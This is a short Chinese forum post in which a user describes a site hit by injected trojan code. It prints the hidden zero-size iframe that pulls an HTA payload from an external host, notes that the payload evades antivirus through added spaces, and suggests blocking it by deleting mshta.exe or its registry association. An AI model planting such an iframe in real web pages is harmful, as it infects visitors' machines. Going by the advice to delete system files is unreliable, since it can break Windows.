讓人掛馬了,真是郁悶~ 木馬代碼如下 CODE: [Copy to clipboard] -------------------------------------------------------------------------------- <IFRAME marginWidth=0 marginHeight=0 src="http://www.cnbct.be/hack/joke.htm" frameBorder=0 width=0 scrolling=no height=0></IFRAME> 是hta自動彈出的木馬, 我查看他的木馬頁面裡windows.htm裡 代碼內容加了一些空格,基本可以躲避過殺毒軟件的查殺 對於沒有對付木馬經驗的人,機器已經中標了... 身為黑基的人,我badwolf需要為黑基地人做點事~ 好開始這裡介紹1下用1個簡單的方法徹底禁止他木馬在你機器運行 看這個 C:/WINDOWS/system32/mshta.exe 這個是運行*.hta文件的exe文件 1是刪除這個exe文件 或者進入注冊表 搜索.hta 然後把相對應的注冊表導出 然後刪除他 也就刪除了*.hta擴展名文件與mshta.exe的注冊表關聯 所以當打開掛馬頁面,也只會下載個*.hta文件並不會運行 也就不會中木馬了.. 其他格式的木馬也差不多例如*.wmf的也用同樣方法。
,5自學網,5自學網
